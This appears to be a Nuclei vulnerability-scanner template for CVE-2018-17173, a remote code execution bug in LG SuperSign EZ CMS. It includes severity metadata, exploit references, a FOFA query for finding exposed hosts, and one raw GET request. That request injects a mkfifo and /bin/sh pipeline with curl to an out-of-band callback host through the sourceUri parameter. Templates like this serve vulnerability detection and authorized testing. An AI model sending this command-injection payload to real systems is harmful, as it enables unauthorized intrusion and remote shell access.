CVE-2018-17173: LG Supersign EZ CMS - Remote Code Execution

id: CVE-2018-17173

info:
  name: LG Supersign EZ CMS - Remote Code Execution
  author: pussycat0x
  severity: critical
  description: |
    LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail.
  reference:
    - http://mamaquieroserpentester.blogspot.com/2018/09/lg-supersign-rce-to-luna-and-back-to.html
    - http://packetstormsecurity.com/files/152733/LG-Supersign-EZ-CMS-Remote-Code-Execution.html
    - https://www.exploit-db.com/exploits/45448/
    - https://www.exploit-db.com/exploits/46795/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-17173
    cwe-id: CWE-94
    epss-score: 0.76568
    epss-percentile: 0.9888
    cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: lg
    product: supersign_cms
    fofa-query: title="LG SuperSign"
  tags: cve,cve2018,lg,supersign-cms,rce,vkev,vuln

http:
  - raw:
      - |
        GET /qsr_server/device/getThumbnail?sourceUri=\'%2b-%253brm%2b/tmp/f%253bmkfifo%2b/tmp/f%253bcat%2b/tmp/f|/bin/sh%2b-i%2b2>%25261|curl%2bhttp%253a//{{interactsh-url}}%2b>/tmp/f%253b\';&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
          - "dns"
        condition: or

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 4b0a00483046022100ed0926a6154a79a820d9b7b480bbc81c9bf333341a7f08031b17a697aa425166022100bea40c9b42e790af39b61a1dc8a82158aa35d78d59add275d98d6f09afae5522:922c64590222798bb761d5b6d8e72950